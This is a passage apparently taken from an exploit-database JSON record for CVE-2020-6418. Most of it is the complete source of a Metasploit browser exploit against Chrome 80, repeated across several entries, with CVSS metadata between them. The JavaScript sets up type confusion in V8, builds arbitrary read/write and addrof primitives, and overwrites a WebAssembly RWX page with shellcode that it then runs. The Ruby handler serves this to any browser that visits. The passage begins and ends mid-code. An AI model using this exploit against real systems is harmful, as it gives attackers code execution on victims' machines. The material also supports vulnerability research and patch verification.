We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 
0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n jscript = add_debug_print_js(jscript)\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n 
end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-04-29T06:47:00", "description": "# CVE_2020_6418_PoC\nfor \u4f9b\u990a\n\nSandbox escape exploit not included....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-13T07:32:24", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-04-29T02:54:21", "id": "D253294E-AE35-5B65-8B7D-17D007162D00", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:54:29", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T06:23:59", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2022-06-03T11:27:26", "id": "43EBEC21-E951-555D-B83D-6CE834F5BF3C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:36", "description": "# CVE-2020-1020\nWi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-10T03:10:39", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2022-04-24T16:54:15", "id": "6E95B9E1-979B-595D-A4F4-99125E6059E4", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2022-03-31T19:34:14", "description": "This Metasploit module exploits an issue in Google Chrome version 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "zdt", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34056", "href": "https://0day.today/exploit/description/34056", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 
'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => 'Feb 19 2020'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] #{request.body}\")\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() {\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within 
the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides 
arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. 
We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 
0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n 
jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34056", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-05T22:51:46", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156632", "href": "https://packetstormsecurity.com/files/156632/Google-Chrome-80-JSCreate-Side-Effect-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit', \n'Description' => %q{ \nThis module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit \ncorrupts the length of a float array (float_rel), which can then be used for out \nof bounds read and write on adjacent memory. \nThe relative read and write is then used to modify a UInt64Array (uint64_aarw) \nwhich is used for read and writing from absolute memory. \nThe exploit then uses WebAssembly in order to allocate a region of RWX memory, \nwhich is then replaced with the payload shellcode. 
\nThe payload is executed within the sandboxed renderer process, so the browser \nmust be run with the --no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Cl\u00e9ment Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # exploit \n'Vignesh S Rao', # exploit \n'timwr', # metasploit copypasta \n], \n'References' => [ \n['CVE', '2020-6418'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'], \n['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'], \n['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'], \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}], \n['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}], \n], \n'DisclosureDate' => 'Feb 19 2020')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] #{request.body}\") \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nescaped_payload = Rex::Text.to_unescape(payload.raw) \njscript = %Q^ \nvar shellcode = unescape(\"#{escaped_payload}\"); \n \n// HELPER FUNCTIONS \nlet conversion_buffer = new ArrayBuffer(8); \nlet float_view = new Float64Array(conversion_buffer); \nlet int_view = new BigUint64Array(conversion_buffer); \nBigInt.prototype.hex = function() { \nreturn '0x' + this.toString(16); \n}; \nBigInt.prototype.i2f = function() { \nint_view[0] = this; \nreturn float_view[0]; \n} \nBigInt.prototype.smi2f = function() { \nint_view[0] = this << 32n; \nreturn float_view[0]; \n} \nNumber.prototype.f2i = function() { \nfloat_view[0] = this; \nreturn int_view[0]; \n} 
\nNumber.prototype.f2smi = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.fhw = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.flw = function() { \nfloat_view[0] = this; \nreturn int_view[0] & BigInt(2**32-1); \n} \n \nNumber.prototype.i2f = function() { \nreturn BigInt(this).i2f(); \n} \nNumber.prototype.smi2f = function() { \nreturn BigInt(this).smi2f(); \n} \n \nfunction hex(a) { \nreturn a.toString(16); \n} \n \n// \n// EXPLOIT \n// \n \n// the number of holes here determines the OOB write offset \nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1]; \nvar float_rel; // float array, initially corruption target \nvar float_carw; // float array, used for reads/writes within the compressed heap \nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space \nvar obj_leaker; // used to implement addrof \nvuln.pop(); \nvuln.pop(); \nvuln.pop(); \n \nfunction empty() {} \n \nfunction f(nt) { \n// The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug \nvuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 
0.2 : 156842065920.05); \nfor (var i = 0; i < 0x10000; ++i) {}; \n} \n \nlet p = new Proxy(Object, { \nget: function() { \nvuln[0] = {}; \nfloat_rel = [0.2, 1.2, 2.2, 3.2, 4.3]; \nfloat_carw = [6.6]; \nuint64_aarw = new BigUint64Array(4); \nobj_leaker = { \na: float_rel, \nb: float_rel, \n}; \n \nreturn Object.prototype; \n} \n}); \n \nfunction main(o) { \nfor (var i = 0; i < 0x10000; ++i) {}; \nreturn f(o); \n} \n \n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel \nfunction crel_read4(offset) { \nvar qw_offset = Math.floor(offset / 2); \nif (offset & 1 == 1) { \nreturn float_rel[qw_offset].fhw(); \n} else { \nreturn float_rel[qw_offset].flw(); \n} \n} \n \n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel \nfunction crel_write4(offset, val) { \nvar qw_offset = Math.floor(offset / 2); \n// we are writing an 8-byte double under the hood \n// read out the other half and keep its value \nif (offset & 1 == 1) { \ntemp = float_rel[qw_offset].flw(); \nnew_val = (val << 32n | temp).i2f(); \nfloat_rel[qw_offset] = new_val; \n} else { \ntemp = float_rel[qw_offset].fhw(); \nnew_val = (temp << 32n | val).i2f(); \nfloat_rel[qw_offset] = new_val; \n} \n} \n \nconst float_carw_elements_offset = 0x14; \n \nfunction cabs_read4(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read4: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].flw(); \n// TODO restore elements ptr \nreturn res; \n} \n \n \n// This function provides arbitrary within read the compressed heap \nfunction cabs_read8(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read8: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].f2i(); \n// TODO restore elements ptr \nreturn res; \n} \n \n// This function provides arbitrary write within the compressed heap \nfunction cabs_write4(caddr, val) 
